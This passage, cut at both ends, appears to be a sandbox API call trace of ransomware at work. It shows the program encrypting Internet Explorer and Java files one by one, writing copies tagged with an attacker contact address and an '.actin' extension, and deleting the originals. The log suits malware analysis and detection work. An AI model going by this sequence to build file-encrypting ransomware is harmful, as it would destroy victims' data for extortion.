(lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files\\internet explorer\\ieshims.dll")) returned 0x20 [0148.978] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\internet explorer\\ieshims.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.978] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files\\internet explorer\\ieshims.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.978] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.978] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.979] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=824128) returned 1 [0148.979] CloseHandle (hObject=0x2f8) returned 1 [0148.979] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe")) returned 0x20 [0148.979] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\internet explorer\\iexplore.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.979] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.979] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\images\\bing.ico" (normalized: "c:\\program files\\internet explorer\\images\\bing.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.980] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=5430) returned 1 [0148.980] CloseHandle (hObject=0x2f8) returned 1 [0148.981] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\images\\bing.ico" (normalized: "c:\\program files\\internet explorer\\images\\bing.ico")) returned 0x20 [0148.981] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\images\\bing.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\internet explorer\\images\\bing.ico.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.981] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\images\\bing.ico" (normalized: "c:\\program files\\internet explorer\\images\\bing.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.981] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.981] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0149.171] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=452) returned 1 [0149.171] CloseHandle (hObject=0x2e4) returned 1 [0149.171] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins")) returned 0x20 [0149.171] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0149.171] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0149.171] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0149.171] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0149.171] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0149.172] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3470) returned 1 [0149.172] CryptSetKeyParam (hKey=0xac3470, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0149.172] ReadFile (in: hFile=0x2e4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x1c4, lpOverlapped=0x0) returned 1 [0149.173] CryptEncrypt (in: hKey=0xac3470, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x1d0, dwBufLen=0x1d0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x1d0) returned 1 [0149.173] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x1d0, lpOverlapped=0x0) returned 1 [0149.174] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac33f0) returned 1 [0149.174] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0149.174] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0149.174] CryptDestroyKey (hKey=0xac33f0) returned 1 [0149.174] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0149.175] CryptDestroyKey (hKey=0xac3470) returned 1 [0149.175] CloseHandle (hObject=0x2e4) returned 1 [0149.175] CloseHandle (hObject=0x2f4) returned 1 [0149.175] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins")) returned 1 [0149.176] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0149.176] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\bci.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0149.177] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=16960) returned 1 [0149.177] CloseHandle (hObject=0x2f4) returned 1 [0149.177] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\bci.dll")) returned 0x20 [0149.177] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\bci.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0149.177] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\bci.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0149.178] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0149.178] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0149.178] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\bci.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0149.178] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3470) returned 1 [0149.178] CryptSetKeyParam (hKey=0xac3470, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0149.178] ReadFile (in: hFile=0x2f4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x4240, lpOverlapped=0x0) returned 1 [0149.180] CryptEncrypt (in: hKey=0xac3470, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4250, dwBufLen=0x4250 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4250) returned 1 [0149.180] WriteFile (in: hFile=0x2e4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x4250, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x4250, lpOverlapped=0x0) returned 1 [0149.181] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3430) returned 1 [0149.181] CryptSetKeyParam (hKey=0xac3430, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0149.181] CryptEncrypt (in: hKey=0xac3430, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x30, dwBufLen=0x30 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x30) returned 1 [0149.181] CryptDestroyKey (hKey=0xac3430) returned 1 [0149.181] WriteFile (in: hFile=0x2e4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xe2, lpOverlapped=0x0) returned 1 [0149.181] CryptDestroyKey (hKey=0xac3470) returned 1 [0149.181] CloseHandle (hObject=0x2f4) returned 1 [0149.181] CloseHandle (hObject=0x2e4) returned 1 [0149.182] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\bci.dll")) returned 1 [0149.183] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0149.183] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dcpr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0149.183] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=159808) returned 1 [0149.183] CloseHandle (hObject=0x2e4) returned 1 [0149.183] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dcpr.dll")) returned 0x20 [0149.183] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dcpr.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0149.183] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dcpr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0149.183] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0149.183] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0149.183] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dcpr.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0149.184] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2d70) returned 1 [0149.184] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0149.184] ReadFile (in: hFile=0x2e4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x27040, lpOverlapped=0x0) returned 1 [0149.189] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x27050, dwBufLen=0x27050 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x27050) returned 1 [0149.189] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x27050, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x27050, lpOverlapped=0x0) returned 1 [0149.192] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2f30) returned 1 [0149.192] CryptSetKeyParam (hKey=0xac2f30, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0149.192] CryptEncrypt (in: hKey=0xac2f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0149.192] CryptDestroyKey (hKey=0xac2f30) returned 1 [0149.192] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0149.192] CryptDestroyKey (hKey=0xac2d70) returned 1 [0149.192] CloseHandle (hObject=0x2e4) returned 1 [0149.193] CloseHandle (hObject=0x2f4) returned 1 [0149.193] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dcpr.dll")) returned 1 [0149.194] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0149.194] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\decora_sse.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0149.195] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=86080) returned 1 [0149.195] CloseHandle (hObject=0x2f4) returned 1 [0149.195] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\decora_sse.dll")) returned 0x20 [0149.195] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\decora_sse.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0149.195] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\decora_sse.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0149.196] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0149.196] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0149.196] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\decora_sse.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0149.196] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2e70) returned 1 [0149.196] CryptSetKeyParam (hKey=0xac2e70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0149.196] ReadFile (in: hFile=0x2f4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x15040, lpOverlapped=0x0) returned 1 [0149.200] CryptEncrypt (in: hKey=0xac2e70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x15050, dwBufLen=0x15050 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x15050) returned 1 [0149.201] WriteFile (in: hFile=0x2e4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x15050, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x15050, lpOverlapped=0x0) returned 1 [0149.203] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3130) returned 1 [0149.203] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0149.203] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0149.203] CryptDestroyKey (hKey=0xac3130) returned 1 [0149.203] WriteFile (in: hFile=0x2e4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0149.203] CryptDestroyKey (hKey=0xac2e70) returned 1 [0149.203] CloseHandle (hObject=0x2f4) returned 1 [0149.203] CloseHandle (hObject=0x2e4) returned 1 [0149.203] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\decora_sse.dll")) returned 1 [0149.205] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0149.205] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\deploy.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0149.205] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=587840) returned 1 [0149.205] CloseHandle (hObject=0x2e4) returned 1 [0149.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\deploy.dll")) returned 0x20 [0149.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\deploy.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0149.205] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\deploy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0149.205] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0149.205] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0149.206] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\deploy.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0149.206] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3130) returned 1 [0149.206] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0149.206] ReadFile (in: hFile=0x2e4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x8f840, lpOverlapped=0x0) returned 1 [0149.402] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x8f850, dwBufLen=0x8f850 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x8f850) returned 1 [0149.403] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x8f850, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x8f850, lpOverlapped=0x0) returned 1 [0149.416] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3170) returned 1 [0149.416] CryptSetKeyParam (hKey=0xac3170, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0149.416] CryptEncrypt (in: hKey=0xac3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0149.416] CryptDestroyKey (hKey=0xac3170) returned 1 [0149.416] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0149.416] CryptDestroyKey (hKey=0xac3130) returned 1 [0149.416] CloseHandle (hObject=0x2e4) returned 1 [0149.416] CloseHandle (hObject=0x2f4) returned 1 [0149.417] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\deploy.dll")) returned 1 [0149.422] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0149.422] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll" (normalized: "c:\\program 